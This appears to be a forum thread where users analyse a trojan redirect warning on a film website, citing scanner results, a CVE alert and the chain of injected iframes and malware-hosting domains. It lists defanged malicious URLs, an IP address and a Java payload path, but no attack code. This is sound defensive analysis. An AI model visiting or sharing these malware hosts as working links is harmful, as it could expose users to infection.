JS:Redirector-FX[Trj]

Viruses and worms
1

Been trying to access www dot showfilmfirst dot com today and keep getting the following “trojan horse blocked” warning:

Object: http://www dot showfilmfirst dot com/
Infection: JS:Redirector-FX[Trj]
Action: Connection Aborted

I’ve never had any problems accessing this website before. In fact 2 days ago I signed up to become a VIP member with the same website. I’ve tried accessing it with Chrome and Internet Explorer.

I use this website quite a bit. Any ideas why this is happening suddenly?

2

Please, do not post live links to malware or false positives!
Use httx or www . shwfilfirst . com

3

Sucuri Scanner say infected, see screenshot

4

That takes all the fun out of hunting for it… :stuck_out_tongue:

5

well you can still do Jsunpack :wink: naaaaa … already have, and it is very red malicious: Alert detected /alert CVE-2010-0249

Here is wepawet
http://wepawet.cs.ucsb.edu/view.php?hash=b6478ed3f43807f1437d5454d2a157ed&t=1301343631&type=js

6

I use Malzilla and Notepad++ only jsunpack to try and deobfuscate it ;D

7

Well, Pondus is right, so what is out there at htxp://www.showfilmfirst.com/
Known javascript malware: http://sucuri.net/malware/malware-entry-mwjs1240
to know excactly, 11 instances of this same javascript malware…
Javascript included and used to distribute malware on osCommerce sites. The code is disguised as color pick,
but in fact loads a malicous iframe (for the Fake AV)…
See the sucuri scan site for the technical details where the malware was found…

polonus

8

What is the fun as jsunpack clearly states malicious: hxtp://jsunpack.jeek.org/dec/go?report=5f417080b4d7eac44ef31df1094fa022063f5fcb
(Only go there when you are enough security aware and with enough protection against malscript spilling, e.g. NotScripts or NoScript protection inside the browser in a sandbox, cleanse your browser contents and scan your user files if in doubt). Besides here is a discussion about detecting and cleansing the infection from an osCommerce site: http://forums.oscommerce.com/topic/335941-site-infected-by-infected-jsredirector-h3-trj/

polonus

9

SOPHOS analyis confirms infected

showfilmfirst.com.htm -- identity created/updated (New detection Troj/JSRedir-DC)

NORMAN analysis

showfilmfirst.com.htm : Processed - JS/IFrame.EE

Above website page is injected with malicious script which further writes an iframe “htxp://86.55.140.203/…” and again it redirects to malicious script hosted at legitimate website “htxp://tongho.co.th/…”

10

Hi Pondus,

If I go here and open op unmasked parasites on http://www.google.com/safebrowsing/diagnostic?site=tongho.co.th
then initially I get clean, but when I really click through for this page I get:
http://www.google.com/safebrowsing/diagnostic?site=tongho.co.th

The last time Google visited this site was on 29/03/2011. The last time suspicious content was found on this site was on 29/03/2011.
Malicious software includes 203 trojan (s), 111 scripting exploit (s).

This site was hosted on a network (s) including AS23884 (PROENNET).

Has this site acted as an intermediary resulting in further distribution of malware?
It seems that tongho.co.th the past 90 days has functioned as an intermediary for the infection of 168 site (s) including freephotopaper.com /, webandgraphicsolutions.com /, componentesdebisuteria.es /.

Has this site hosted malware?
Yes, this site has in the past 90 days hosted malicious software. It infected 387 domain (s), including babyinfanti.cl /, m-indya.com /, freephotopaper.com /.


I also experience that on URLVoid all seems clean but inspecting further by clicking the sublinks the site is flagged somewhere… So you better always verify when you are checking these resources…
And now at the original scan site there unmasked parasites finds reason for suspicion now:
http://www.google.com/safebrowsing/diagnostic?site=www.showfilmfirst.com

Malicious software includes 2 scripting exploits. Successful infection resulted in an average of 1 new process on the target machine.

Malicious software is hosted on 4 domains,e.g. guardwinscan.com/, solomon-vl.cz.cc/, tournamentwinscan.com/.

2 domains appear to be functioning as intermediaries for distributing malware to visitors of this site, including 86.55.140.0 /, protectprofitscan.com /.

This site was hosted on 1 network(s) including AS20738 (AS20738).

See for the origin of distributed malware: http://safeweb.norton.com/report/show?name=protectprofitscan.com
Firefox Malware site
G-Data Malware site
Google Safebrowsing Malware site
Small wonder it now appears here on the netblocks list during the last 24 hrs: http://www.pyrenean.com/Netblocks
and a nice article on the DNS Super Black Hole can be found here: http://www.computersecurityarticles.info/tag/hunting/
source: computersecurityarticles dot info

pol

11

So from the one malware hopping to the other, took a glance at: htxp://solomon-vl.cz.cc/574a353789f/ob.jar

What is out there? JAVA/Exdoer.S detection: http://www.virustotal.com/file-scan/report.html?id=631b5e7976e5c28c1e3fad5cd3697e20b5c27d5dc42c87499b231fde55c7a0de-1301380375

Here it was, now dead: htxp://sfzzjd.com/games/player.jar

But avast missed it: http://www.virustotal.com/file-scan/report.html?id=a699d7d50006d576e1b23c316e334ce6f52c09919ee18dd85635f58fd490a929-1300680344

pol